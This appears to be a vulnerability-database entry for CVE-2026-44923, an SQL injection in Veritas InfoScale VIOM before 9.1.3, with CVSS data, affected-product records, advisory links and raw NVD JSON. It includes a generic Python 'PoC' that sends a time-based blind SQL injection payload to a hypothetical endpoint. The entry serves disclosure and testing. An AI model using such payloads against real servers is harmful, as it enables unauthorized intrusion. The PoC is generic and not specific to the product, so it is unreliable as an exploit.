Security Vulnerability Report
中文
CVE-2026-44923 CVSS 6.5 MEDIUM

CVE-2026-44923

Published: 2026-05-20 17:16:24
Last Modified: 2026-05-21 16:57:56

Description

SQL injection in InfoScale VIOM before v9.1.3 allows remote attackers to escalate privileges.

CVSS Details

CVSS Score
6.5
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N

Configurations (Affected Products)

cpe:2.3:a:veritas:infoscale_operations_manager:*:*:*:*:*:*:*:* - VULNERABLE
Veritas InfoScale VIOM < v9.1.3

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests # Target URL (Hypothetical endpoint for VIOM) target_url = "https://target-viom-server/api/vulnerable_endpoint" # SQL Injection payload to test for vulnerability # Example: Checking for time-based blind injection payload = "1' AND SLEEP(5)-- " params = { "id": payload } try: response = requests.get(target_url, params=params, verify=False, timeout=10) if response.elapsed.total_seconds() > 5: print("[+] Potential SQL Injection vulnerability confirmed (Time-based).") else: print("[-] Vulnerability not detected or patched.") except Exception as e: print(f"Error during PoC execution: {e}")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-44923", "sourceIdentifier": "[email protected]", "published": "2026-05-20T17:16:24.013", "lastModified": "2026-05-21T16:57:56.200", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "SQL injection in InfoScale VIOM before v9.1.3 allows remote attackers to escalate privileges."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 2.5}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-89"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:veritas:infoscale_operations_manager:*:*:*:*:*:*:*:*", "versionEndExcluding": "9.1.3", "matchCriteriaId": "6B9304E9-399B-40DD-B806-F8E540AE1A72"}]}]}], "references": [{"url": "https://supportinfoscale.cloud.com/support-home/kbsearch/article?articleNumber=1000766080&articleTitle=InfoScale_Operations_Manager_IOM_web_application_Security_Bulletin_for_CVE_2026_44923_CVE_2026_44924_and_CVE_2026_44925", "source": "[email protected]", "tags": ["Vendor Advisory"]}, {"url": "https://www.veritas.com/support/en_US/doc/120571566-166757640-0/viom_tot_v118836641-166757640", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}